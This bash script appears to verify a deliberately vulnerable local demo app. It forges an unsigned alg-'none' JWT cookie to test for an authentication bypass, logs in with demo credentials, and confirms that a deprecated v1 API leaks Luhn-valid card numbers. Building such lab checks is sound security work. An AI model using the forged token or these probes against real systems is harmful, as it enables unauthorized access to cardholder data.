#!/usr/bin/env bash
# ANSI colour sequences for the status lines. They are stored as literal
# backslash escapes and only turned into bytes when printf interprets them
# as part of its format string.
declare RED='\033[0;31m' GREEN='\033[0;32m' NC='\033[0m'
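#######################################
# Check whether a digit string passes the Luhn checksum.
# Arguments: $1 - candidate PAN (digits only)
# Returns:   0 if the checksum is valid, 1 otherwise. An empty, missing or
#            non-numeric argument is rejected instead of being summed to 0
#            (which previously made "" pass as a valid PAN).
#######################################
isLUHNValid() {
  local pan="${1-}"
  # Non-digits would otherwise be evaluated as arithmetic variable names
  # (silently becoming 0) and an empty string would trivially pass.
  [[ "$pan" =~ ^[0-9]+$ ]] || return 1
  local panlen="${#pan}"
  local sum=0
  local i digit
  for ((i = panlen - 1; i >= 0; i--)); do
    digit="${pan:$i:1}"
    # Every second digit counted from the right is doubled; a two-digit
    # product contributes the sum of its digits, i.e. product - 9.
    if (((panlen - i) % 2 == 0)); then
      ((digit *= 2))
      ((digit > 9)) && ((digit -= 9))
    fi
    ((sum += digit))
  done
  ((sum % 10 == 0))
}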
# Check jq installed
# jq extracts fields from the JSON responses below; fail fast so a missing
# tool is not misreported later as a failed probe.
if ! command -v jq >/dev/null 2>&1; then
  # %b expands the backslash escapes held in RED/NC, same as embedding them
  # in the format string.
  printf '%bERROR: jq could not be found%b\n' "$RED" "$NC"
  exit 1
fi
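# BAD JWT
# Probe: present a token whose header declares alg "none" (no signature) and
# see whether the cards endpoint treats it as authenticated. A correctly
# configured verifier rejects unsigned tokens; a "success" message means the
# signature check is being bypassed.
echo -n "Checking if unsigned JWT can be used against web app.. "
# The assignment's status is curl's exit status, so transport errors are
# caught here without a separate $? check.
if ! BAD_JWT=$(curl -s -k \
  -H $'Host: localhost:3000' \
  -b $'RBRD_AUTH=eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyX2lkIjoxLCJ1c2VybmFtZSI6InVzZXIxIiwiRW1haWwiOiJ1c2VyMUBleGFtcGxlLmNvbSIsImlhdCI6MTY3NTQ0NjAyOCwiZXhwIjo5OTk5OTk5OTk5fQ.' \
  $'http://localhost:3000/api/v2/cards'); then
  printf "\t\t${RED}[Fail]${NC}\n"
  exit 1
fi
# Quote the body so word-splitting and globbing cannot alter the JSON before
# jq sees it; grep keeps only a message containing "success".
BAD_JWT_SUCCESS=$(printf '%s' "$BAD_JWT" | jq -r .message | grep success)
if [[ "$BAD_JWT_SUCCESS" == "success" ]]; then
  printf "\t\t${GREEN}[OK]${NC}\n"
else
  printf "\t\t${RED}[Fail]${NC}\n"
  exit 1
fi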
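# AUTH
# Log in with the demo account and keep the session cookie in a jar file for
# the follow-up requests.
echo -n "Authenticating against web app and fetching cookie.. "
# The jar holds a live session cookie; remove it on any exit path instead of
# leaving it in the working directory.
trap 'rm -f -- curl_cookie_jar.txt' EXIT
# NOTE: curl -s exits 0 on an HTTP 4xx/5xx as well, so a rejected login is
# only noticed when the next request comes back without card data.
if AUTH=$(curl -s -k --cookie-jar curl_cookie_jar.txt -X $'POST' \
  -H $'Host: localhost:3000' -H $'Content-Type: application/x-www-form-urlencoded' \
  --data-binary $'Email=user1%40example.com&Password=user1' \
  $'http://localhost:3000/api/login'); then
  printf "\t\t${GREEN}[OK]${NC}\n"
else
  printf "\t\t${RED}[Fail]${NC}\n"
  exit 1
fi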
# VULNERABLE ENDPOINT ACCESSIBLE?
# Replay the session cookie against the deprecated v1 endpoint and keep the
# body for the next check only if it parses as JSON.
echo -n "Checking if deprecated API endpoint is accessible.. "
JSON=$(curl -s --cookie curl_cookie_jar.txt \
  -H $'Host: localhost:3000' \
  $'http://localhost:3000/api/v1/cards')
# jq -e fails on unparsable input, so this doubles as the reachability test.
if jq -e . <<<"$JSON" >/dev/null 2>&1; then
  printf "\t\t${GREEN}[Accessible]${NC}\n"
else
  printf "\t\t${RED}[Invalid JSON]${NC}\n"
  exit 1
fi
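# VALID PAN RETURNED?
echo -n "Checking if deprecated API endpoint is returning card info.. "
# Pull the first card's PAN from the JSON captured above. The response is
# quoted so echo/word-splitting cannot mangle it; jq errors (e.g. .data not an
# array) are silenced and simply leave PAN empty, which reports as a failure.
PAN=$(printf '%s' "$JSON" | jq -r '.data[0].PAN' 2>/dev/null)
# Require the whole value to be a 14-19 digit string before running the Luhn
# check (stricter than the previous "contains digits" grep): jq prints "null"
# for a missing field, and an empty or non-numeric value must not be reported
# as a valid PAN. The argument is quoted so an empty string is never dropped.
if [[ "$PAN" =~ ^[0-9]{14,19}$ ]] && isLUHNValid "$PAN"; then
  printf "\t${GREEN}[Valid PAN returned]${NC}\n"
else
  printf "\t${RED}[Invalid PAN returned]${NC}\n"
  exit 1
fi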